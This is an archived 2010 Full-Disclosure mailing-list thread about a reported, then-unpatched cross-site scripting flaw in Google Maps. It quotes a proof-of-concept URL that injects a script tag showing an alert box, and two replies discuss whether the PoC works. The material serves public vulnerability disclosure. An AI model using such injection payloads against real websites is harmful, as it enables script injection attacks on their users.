[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <3af3d47c1001120502v46eb6b58i7dced45ca7c4c572@mail.gmail.com>
Date: Tue, 12 Jan 2010 14:02:16 +0100
From: Christian Sciberras <uuf6429@...il.com>
To: Michael Lenz <shadow.stalker@....de>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Google Maps XSS (currently unpatched)
I tried the PoC and it works as advertised, however due to the amount
of requests to the same url, I suppose Google noticed something
fishy...
Regards,
Chris.
On Tue, Jan 12, 2010 at 1:58 PM, Michael Lenz <shadow.stalker@....de> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Your PoC generates:
>
> "
> *Google*
> Sorry...
>
>
> We're sorry...
>
> ... but your computer or network may be sending automated queries. To
> protect our users, we can't process your request right now.
>
> See Google Help
> <http://www.google.com/support/bin/answer.py?answer=86640> for more
> information.
>
> © 2009 Google - Google Home <http://www.google.com>"
>
>
> So..?
>
> gaurav baruah schrieb:
>> Google Maps XSS (currently unpatched)
>>
>> Discovered By -
>> Pratul Agrawal (pratul2u@...il.com)
>> Gaurav Baruah (baruah.gaurav@...il.com)
>>
>>
>> PoC -
> http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> gaurav baruah schrieb:
>> Google Maps XSS (currently unpatched)
>>
>> Discovered By -
>> Pratul Agrawal (pratul2u@...il.com)
>> Gaurav Baruah (baruah.gaurav@...il.com)
>>
>>
>> PoC -
> http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>
> iEYEARECAAYFAktMcfAACgkQ12k6J+72BxijGwCgvA7qEWtv8D9ImB9vGc8FBkZf
> xOUAnjUQ3dhG6bGwg690pqDXLyzeDQYC
> =GYKt
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists